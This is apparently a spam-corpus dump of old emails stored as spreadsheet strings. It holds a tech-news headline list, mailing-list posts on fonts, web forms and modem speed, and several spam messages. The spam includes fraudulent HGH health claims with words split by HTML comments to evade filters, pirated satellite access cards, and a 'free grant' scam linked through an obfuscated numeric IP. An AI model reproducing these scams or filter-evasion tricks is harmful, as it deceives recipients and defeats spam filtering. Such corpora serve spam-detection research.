     Bulging postbag. Kinda
         http://www.theregister.co.uk/content/54/26130.html
 Internet
     al-Qaeda poised to strike hard via the Internet
     Red Alert Finger on the button
         http://www.theregister.co.uk/content/6/26134.html
     Dutch ban virtual kinderporno
     Fake images, real depravity
         http://www.theregister.co.uk/content/6/26132.html
     Tiscali to shut second UK office. Or not
     Shurely shome mishtake?
         http://www.theregister.co.uk/content/6/26131.html
     Liverpool Council bans email on Wednesdays
     But only internal, and no sanctions
         http://www.theregister.co.uk/content/6/26128.html
     IC24 launches daytime Net service
     Remember them?
         http://www.theregister.co.uk/content/6/26127.html
     Future for online content is bright 
     Screen Digest's screen dump
         http://www.theregister.co.uk/content/6/26122.html
 Net Security
     al-Qaeda poised to strike hard via the Internet
     Red Alert Finger on the button
         http://www.theregister.co.uk/content/55/26134.html
     Internet attacks on the rise
     Surprise, surprise
         http://www.theregister.co.uk/content/55/26119.html
 Business
     Dell rules out Lexmark purchase
     Interested in ink, not inking
         http://www.theregister.co.uk/content/7/26115.html
 Networks
     Networking vendors eat their babies
     Hey, it's a tough world out there
         http://www.theregister.co.uk/content/5/26133.html
     Cisco to roll out airport WLAN hotspots in Europe
     Claims 19 signed so far
         http://www.theregister.co.uk/content/5/26114.html
 Broadband
     Blueyonder and One.Tel in broadband promos
     But not together
         http://www.theregister.co.uk/content/22/26120.html
 About The Register
     Hacker t-shirt launched in medium
     Good news for any reader under 16 stone
         http://www.theregister.co.uk/content/31/26123.html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</si>
  <si>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Subject: Take Advantage of Viral Marketing
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Digital Publishing Tools - Free Software Alert!&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF" text="#000000"&gt;
 &lt;center&gt;
 &lt;table width="582" border="2" cellspacing="0" cellpadding="5" bordercolor="#0077CC"&gt;
 &lt;tr&gt;
 &lt;td colspan="3" width="582" align="center" bgcolor="#0077CC"&gt;&lt;!7332Cjxg6-609ndOK3808Gl21&gt;
 &lt;a href="http://3dpageturningebook.com" style="text-decoration:none;"&gt;
 &lt;b&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="4" color="#FFFFFF"&gt;Publish Like a Professional with Digital Publishing Tools&lt;/font&gt;&lt;/b&gt;
 &lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="1" width="204" valign="top"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="2"&gt;Easily Create Professional:&lt;/font&gt;&lt;/b&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#000066"&gt;
 &lt;ul&gt;
 &lt;li&gt;eBooks&lt;/li&gt;
 &lt;li&gt;eBrochures&lt;/li&gt;
 &lt;li&gt;eCatalogs&lt;/li&gt;
 &lt;li&gt;Resumes&lt;/li&gt;
 &lt;li&gt;Newsletters&lt;/li&gt;
 &lt;li&gt;Presentations&lt;/li&gt;
 &lt;li&gt;Magazines&lt;/li&gt;
 &lt;li&gt;Photo Albums&lt;/li&gt;
 &lt;li&gt;Invitations&lt;/li&gt;
 &lt;li&gt;Much, much more&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;td colspan="1" width="264" valign="top" align="center"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="2"&gt;Save MONEY! - Save Trees&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;
 Save on Printing, Postage and Advertising Costs&lt;/font&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://3dpageturningebook.com" style="text-decoration:none;"&gt;
 &lt;b&gt;&lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000099" size="5"&gt;DIGITAL PUBLISHING TOOLS&lt;/font&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font face="Verdana Arial, Helvetica, sans-serif" color="#000066" size="3"&gt;DOWNLOAD NEW FREE Version NOW!&lt;/font&gt;&lt;/b&gt;
 &lt;/a&gt;
 &lt;br&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;*Limited Time Offer&lt;/font&gt;
 &lt;/td&gt;
 &lt;td width="204" valign="top"&gt;&lt;b&gt;
 &lt;font face="Verdana Arial, Helvetica, sans-serif" size="2" color="#000066"&gt;Choose from these&lt;br&gt;
 Display Styles:&lt;/font&gt;&lt;/b&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#000066"&gt;
 &lt;ul&gt;
 &lt;li&gt;3D Page Turn&lt;/li&gt;
 &lt;li&gt;Slide Show&lt;/li&gt;
 &lt;li&gt;Sweep/Wipe&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/font&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1" color="#0077CC"&gt;Embed hyperlinks and Link to anywhere Online, 
 such as your Website, Order Page or Contact Form.
 &lt;br&gt;
 &lt;br&gt;
 Distribute via Floppy, CD-ROM, E-Mail or Online.
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan="3" width="582" align="center" bgcolor="#0077CC"&gt; 
 &lt;font color="#FFFFFF" face="Verdana, Arial, Helvetica, sans-serif" size="4"&gt;&lt;b&gt;
 Take your Marketing to the Next Level!&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="2" width="384"&gt; 
 &lt;font size="2" face="Verdana Arial, Helvetica, sans-serif" color="#000066"&gt;
 For &lt;b&gt;More Info&lt;/b&gt;, &lt;b&gt;Samples&lt;/b&gt; or a &lt;b&gt;FREE Download&lt;/b&gt;, click the appropriate link to the right! &amp;nbsp;
 Server demand is extremely high for this limited time &lt;b&gt;Free Software&lt;/b&gt; offer. &amp;nbsp;
 &lt;b&gt;Please try these links periodically if a site seems slow or unreachable.&lt;/b&gt;
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;td colspan="1" width="204" align="center"&gt; 
 &lt;b&gt;&lt;font size="4" face="Verdana, Arial, Helvetica, sans-serif"&gt;
 &lt;a href="http://3dpageturningebook.com"&gt;WEBSITE 1&lt;/a&gt;&lt;br&gt;
 &lt;a href="http://TheyGo.com/FreeSoftware"&gt;WEBSITE 2&lt;/a&gt;&lt;br&gt;
 &lt;a href="http://www.digitalpublishingtools.com"&gt;WEBSITE 3&lt;/a&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="3" width="582" align="center"&gt;
 &lt;form action="http://www.3dpageturningebook.com/unsubscribe.asp" method="post"&gt;
 &lt;font size="2" face="Verdana Arial, Helvetica, sans-serif" color="#000066"&gt;
 If you wish to be removed from our mailing list, please cick the Unsubscribe button
 &lt;/font&gt;
 &lt;br&gt;
 &lt;input size="25" name="e" value="zzzz@jmason.org
 "&gt; &amp;nbsp;&lt;input type="submit" value="Unsubscribe"&gt;
 &lt;input type="hidden" name="c" value="unsub"&gt;
 &lt;/form&gt;
 &lt;font face="Verdana, Arial, Helvetica, sans-serif" color=#000066 size=1&gt;Copyright  2002 - Affiliate ID #1269&lt;br&gt;
 *FREE Version is FULLY FUNCTIONAL with NO EXPIRATION and has a 4 page (2 page spread) limit.&lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Term Insurance Is Out
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_82073_01C2581E.7C88D2C0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  No Term Insurance
  Permanent Insurance is In!
 =20
  Diversified Makes it Better!=09
   _____ =20
  Better... ...products!=09
  Better... ...commissions!=09
  Better... ...case design!=09
  Better... ...service!=09
  Better... ...marketing concepts!=09
   _____ =20
 Aggressive underwriting programs such as...	=20
  	Table 5 to Standard on permanent cases!	=20
 Other company term to permanent life insurance with=20
 non-med underwriting!	=20
 Simplified and guarantee issue programs for multi-life cases!	=20
 Low cost lifetime guarantees!	=20
 UNDERWRITING EVENTS!...	=20
 Diversified Brokerage Specialists has been combining
 the very best in technology and personal service since 1946!=20
 Make sure to ask about our full line of Disability &amp; LTC products!
 "If we can't do it, it can't be done!" =09
 Call Diversified Brokerage Specialists Today!  800-621-6161
 =97 or =97
 Please fill out the form below for more information	=20
 Name:	 	  =09
 E-mail:	 	=20
 Phone:	 	=20
 City:	 	 State:	 	=20
  	    =09
 =20
  Diversified Brokerage Specialists, Inc.=0A=
 Better Service Through
 Technology
 Visit us online at: www.dbs50.com &lt;http://www.dbs50.com&gt; =20
  =20
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insuranceiq.com/optout
 &lt;http://www.Insuranceiq.com/optout/&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 ------=_NextPart_000_82073_01C2581E.7C88D2C0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Term Insurance Is Out&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/dbs/20020805-1.gif" width=3D"540" =
 height=3D"100" alt=3D'No Term Insurance'&gt;&lt;br&gt;=20
             &lt;img src=3D"http://iiq.us/images/dbs/20020805-2.jpg" =
 alt=3D"Permanent Insurance is In!" width=3D"540" height=3D"140"&gt;&lt;br&gt;=20
             &lt;img src=3D"http://iiq.us/images/dbs/20020805-3.gif" =
 width=3D"250" height=3D"200"&gt;&lt;br&gt;=20
             &lt;img src=3D"http://iiq.us/images/dbs/20020805-402.gif" =
 alt=3D"Diversified Makes it Better!" width=3D"433" height=3D"79"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;table width=3D"100%" align=3D"center" cellpadding=3D"0" =
 cellspacing=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;hr width=3D"95%" size=3D"1" color=3D"#000000"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/dbs/20020805-801.gif" alt=3D"Better..." =
 width=3D"149" height=3D"33"&gt;&lt;img =
 src=3D"http://iiq.us/images/dbs/20020805-802.gif" alt=3D"...products!" =
 width=3D"391" height=3D"33"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/dbs/20020805-801.gif" alt=3D"Better..." =
 width=3D"149" height=3D"33"&gt;&lt;img =
 src=3D"http://iiq.us/images/dbs/20020805-804.gif" =
 alt=3D"...commissions!" width=3D"391" height=3D"34"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/dbs/20020805-801.gif" alt=3D"Better..." =
 width=3D"149" height=3D"33"&gt;&lt;img =
 src=3D"http://iiq.us/images/dbs/20020805-805.gif" alt=3D"...case =
 design!" width=3D"391" height=3D"35"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/dbs/20020805-801.gif" alt=3D"Better..." =
 width=3D"149" height=3D"33"&gt;&lt;img =
 src=3D"http://iiq.us/images/dbs/20020805-806.gif" alt=3D"...service!" =
 width=3D"391" height=3D"36"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/dbs/20020805-801.gif" alt=3D"Better..." =
 width=3D"149" height=3D"33" align=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/images/dbs/20020805-807.gif" alt=3D"...marketing =
 concepts!" width=3D"391" height=3D"45"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;hr width=3D"95%" size=3D"1" color=3D"#000000"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2"&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"2" align=3D"center"&gt;&lt;b&gt;&lt;font =
 size=3D"4"&gt;Aggressive underwriting programs such as...&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"8%" rowspan=3D"5" align=3D"right" =
 valign=3D"top"&gt;&lt;img src=3D"http://iiq.us/images/dbs/20020805-5.gif" =
 width=3D"24" height=3D"130"&gt;&lt;/td&gt;
                 &lt;td width=3D"92%"&gt;&lt;b&gt;Table 5 to Standard on permanent =
 cases!&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;b&gt;Other company term to permanent life insurance =
 with &lt;br&gt;
                   non-med underwriting!&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;b&gt;Simplified and guarantee issue programs for =
 multi-life cases!&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;b&gt;Low cost lifetime guarantees!&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;b&gt;UNDERWRITING EVENTS!...&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;=20
             &lt;font size=3D"2" color=3D"#666666"&gt;&lt;b&gt;&lt;br&gt;
             Diversified Brokerage Specialists has been combining&lt;br&gt;
             the very best in technology and personal service since 1946! =
 &lt;/b&gt;&lt;/font&gt;&lt;br&gt;=20
             &lt;b&gt;Make sure to ask about our full line of Disability &amp;amp; =
 LTC products!&lt;br&gt;
             &lt;i&gt;&lt;font color=3D"#FF0000" size=3D"+1"&gt;"If we can't do it, =
 it can't be done!"&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;br&gt;
             &lt;b&gt;&lt;font size=3D"3"&gt;Call Diversified Brokerage Specialists =
 Today!&lt;/font&gt;=20
             &lt;img src=3D"http://iiq.us/images/dbs/20020805-6.gif" =
 alt=3D"800-621-6161" width=3D"532" height=3D"81"&gt;&lt;br&gt;
             &lt;font size=3D"2"&gt;&amp;#8212; or &amp;#8212;&lt;br&gt;
             &lt;table width=3D"95%" border=3D"1" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#eeeeee"&gt;
                       &lt;tr bgcolor=3D"#66CCFF"&gt;=20
                         &lt;td colspan=3D"5" align=3D"center"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Please fill out the form below for more =
 information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;&lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;&lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;&lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%" colspan=3D'3'&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"info@dbs50.com"&gt;=20
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"DBS Ad Inquiry"&gt;=20
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/font&gt;&lt;/b&gt;&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/dbs/20020805-9.gif" =
 alt=3D"Diversified Brokerage Specialists, Inc.&amp;#10;Better Service =
 Through Technology" width=3D"256" height=3D"118"&gt;&lt;br&gt;&lt;br&gt;
             &lt;b&gt;&lt;font size=3D"2"&gt;Visit us online at: &lt;a =
 href=3D"http://www.dbs50.com"&gt;www.dbs50.com&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;=20
             &lt;br&gt;&amp;nbsp;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#FFFFFF"&gt;=20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href=3D"http://www.Insuranceiq.com/optout/"&gt;=20
         http://www.Insuranceiq.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_82073_01C2581E.7C88D2C0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: yyyy,FREE 4 Week Sample of HGH !
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgColor="#CCCCCC" topmargin=1 onMouseOver="window.status=''; return true" oncontextmenu="return false" ondragstart="return false" onselectstart="return false"&gt;
 Hello, jm@netnoteinc.com&lt;BR&gt;
 &lt;BR&gt;
 As se&lt;!--5--&gt;en on NB&lt;!--D--&gt;C, CBS, and CN&lt;!--H--&gt;N, and even Opr&lt;!--D--&gt;ah!  The health&lt;br&gt;
 discove&lt;!--F--&gt;ry that actually revers&lt;!--D--&gt;es aging while burning fat,&lt;br&gt;
 with&lt;!--boy--&gt;out dieti&lt;!--D--&gt;ng or exerc&lt;!--F--&gt;ise!  This pro&lt;!--A--&gt;ven discovery has even&lt;br&gt;
 been report&lt;!--jm--&gt;ed on by the Ne&lt;!--test--&gt;w Engl&lt;!----&gt;and Jour&lt;!--F--&gt;nal of Medi&lt;!--F--&gt;cine.&lt;br&gt;
 For&lt;!--jm--&gt;get aging and d&lt;!----&gt;ieting forever!  And it's Gua&lt;!--S--&gt;ranteed!&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 * Red&lt;!--lo--&gt;uce body fat and build lean muscle WIT&lt;!--jm--&gt;HOUT EXERCISE!&lt;br&gt;
 * Enha&lt;!--jm--&gt;ce se&lt;!--la--&gt;xual perf&lt;!--hehe--&gt;ormance&lt;br&gt;
 * Rem&lt;!--jm--&gt;ove wrinkles and cellulite&lt;br&gt;
 * Lower blood pres&lt;!--jm--&gt;sure and improve choles&lt;!----&gt;terol profile&lt;br&gt;
 * Imp&lt;!--jm--&gt;rove sleep, vision and me&lt;!----&gt;mory&lt;br&gt;
 * Resto&lt;!--jm--&gt;re hair color and gro&lt;!----&gt;wth&lt;br&gt;
 * Stren&lt;!--jm--&gt;gthen the immune sys&lt;!----&gt;tem&lt;br&gt;
 * Incre&lt;!--jm--&gt;ase ener&lt;!----&gt;gy and card&lt;!----&gt;iac output&lt;br&gt;
 * Turn bac&lt;!--jm--&gt;k your body's biol&lt;!----&gt;ogical time cl&lt;!----&gt;ock 10-20 years&lt;br&gt;
 in 6 months of usage !!!&lt;br&gt;&lt;br&gt;
 &lt;a href="http://www.chinaniconline.com/ultimatehgh/"&gt;FOR FRE&lt;!--o--&gt;E INFO&lt;!--you--&gt;RMATION AND G&lt;!--love--&gt;ET FREE 
 1 MON&lt;!--jm--&gt;TH SUPPLY OF HG&lt;!----&gt;H CLICK HERE&lt;/a&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;&lt;BR&gt;
 You are recei&lt;!--jm--&gt;ving this email as a subscr&lt;!----&gt;iber&lt;br&gt;
 to the Opt&lt;!--jm--&gt;-In Ameri&lt;!----&gt;ca Mailin&lt;!----&gt;g Lis&lt;!----&gt;t. &lt;br&gt;
 To remo&lt;!--jm--&gt;ve your&lt;!----&gt;self from all related mailli&lt;!--me--&gt;sts,&lt;br&gt;
 just &lt;a href="http://www.chinaniconline.com/ultimatehgh/remove.php?userid=jm@netnoteinc.com"&gt; 
 Click Here&lt;/a&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Haase wrote:
 &gt; RH ships the code with the bytecode hinter disabled which makes 
 &gt; non-AA fonts really ugly.
 &gt; This reqiures only a small change for include/freetype/config/ftoption.h,
 &gt; it is very well documented.
 Red Hat 8.0 ships with the bytecode hinter enabled; I think 7.3 may have 
 as well.
 The enabling change to "ftoption.h" is made by Red Hat's SRPM before 
 building.  Take a look at "freetype-2.1.1-enable-ft2-bci.patch" from the 
 SRPM; it's pretty clear that this does exactly what needs to be done.
 So if your fonts look ugly, lack of bytecode hinting is *not* the cause.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: EBusiness Webforms: cluetrain has left the station
</t>
  </si>
  <si>
    <t xml:space="preserve">What's wrong with doing business over the Web?  Web forms.  There's
 promising replacements forms, but this is the current state of the
 industry:
  o You find something that you want to fill out.  It's a partnership form,
    a signup for a Web seminar, a request for more information, anything.
  o You start wasting time typing in all those stupid fields and spend
    about 10 minutes going through all their stupid qualification hoops
    just to get a small piece of information , whitepaper, or a callback
    when halfway through, you start to wonder if it's really worth your
    time to forever be stuck on their stupid prospect list. 
  o Pull down tags are never put in order of use instead of alphabetized.
    I was on a site just now that had every single country in the world
    listed; the selection of your country was absolutely critical for you
    to hit submit, but due to the layout, the "more&gt;" tag on the second
    row was offscreen so it was impossible to select any country except
    about two dozen third world countries. 
  o Even worse, ever time you hit submit, all forms based things complain
    about using the universal country phone number format and will cause
    you to re-enter dashes instead of dots.
  o When you get something that's not entered right, you will go back and
    enter it right, but then some other field or most likely pulldown will
    automatically get reset to the default value so that you will have to
    go back and resent that freaking thing too.  Finally after all combinations
    of all pulldowns, you may get a successful submit.
  o You wait freaking forever just to get a confirmation.  
  o Sometimes, like today, you won't be able to ever submit anything due
    to it being impossible to ever submit a valid set of information that
    is internally non-conflicting according to whatever fhead wrote their
    forms submission.
 What's wrong with this picture?  The company is screwing you by wasting
 your time enforcing their data collection standards on you.  I'm sure there's
 someone in that company that would be willing to accept "US", "U.S", "USA"
 "United States", "U of A", "America", etc. and would know exactly which
 freaking country the interested party was from instead of forcing them
 to waste even more time playing Web form geography.  
 I'm starting to see the light of Passport.  You want more information?  Hit
 this passport button.  Voila.  IE6 and Netscape 6,7 have pre-forms sutff,
 but I always turn it off because you never know when there's that one field
 that you don't want to submit to the person you are submitting to that 
 automatically gets sent, i.e. the privacy stuff is well beyond the 
 average user who will get screwed on privacy stuff.  
 So, if crappy forms-based submission is the state of practice for
 business enablement on the Web, I can't see this whole data submission
 and hurry up and wait for us to get back to you business process as
 working all that well.
 Greg
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: free satellite
</t>
  </si>
  <si>
    <t xml:space="preserve">RECIEVE ALL CHANNELS ON YOUR SATELLITE SYSTEM! 1-888-406-4246
 With our Pre-Programmed Satelite Cards get ALL channels
 availible including ALL Pay-Per-View channels!!
 Never miss any of your favorite shows again!
 Our Pre-Programmed Access Cards work on ALL Satellite Systems!
 Our pre-programmed satellite cards are $329.00 and are
 shipped FedEx 2-Day COD Delivery!
 Comes with a 30-Day Money Back Guarantee, 3 Year Warranty
 and a 24-hour tech support line available!
 Take your old card out, replace it with your new one
 and receive everything available!  It's that easy!
 -------------------------------------------------------------
 Order yours TODAY by calling 1-888-406-4246
 This message will only be sent to you once. 
 You will not receive any future updates.
 Any questions please call 1-888-406-4246.
 1722uaWq6-181LTUG3901fJcv5-835bNAI2156DDPV1-l41
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free money from the government!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Qualifying for a free cash grant is easy!
 $10,000 to over $500,000 in FREE Grant Money is Available NOW!
 ~ Never Repay ~
 ~ No Credit Checks ~
 ~ No Interest Charges ~
 See if YOU meet the requirements!
 Visit our website at:
 http://1071396130/index2.htm
 This mailing is done by an independent marketing company.
 We apologize if this message has reached you in error.
 Save the Planet, Save the Trees! Advertise via E mail.
 No wasted paper! Delete with one simple keystroke!
 Less refuse in our Dumps! This is the new way of
 the new millennium!
 To be removed from hearing about all future
 products and services please send
 a separate email to: zapme013@aol.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Modem question
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Breathnach, Proinnsias (Dublin) (breatpro@exchange.ie.ml.com):
 &gt; Is there any reliable way to calculate your connection speed if you don't
 &gt; trust what the modem reports?
 Do a wget of a file of known length, in a script that runs "date" before
 and after (or equivalent).
 Be aware that speed between you and your upstream link is one thing;
 speed through countless congested routers to a faraway location may be
 quite another.  Remember that hardware-level compression is a factor.
 (The file you wget will probably be precompressed.)
 In the area of the slightly more exotic, be aware that different traffic
 may have higher priority and thus more available bandwidth at various
 points in the transit to/from you -- and that some traffic may go via 
 different paths coming vs. going.
 Be aware that raw bulk transfer speed may not be the only thing that
 matters:  Depending on what you're doing, the modem's connection latency
 might matter, and this differs widely between modems.  (It matters more
 for interactive sessions, e.g., ssh remote logins, where each keystroke
 is echoed from remote.)
 -- 
 Cheers,                    "Send a policeman, and have it arrested."
 Rick Moen                     -- Otto von Bismarck, when asked what he 
 rick@linuxmafia.com               would do if the British Army landed.
 -- 
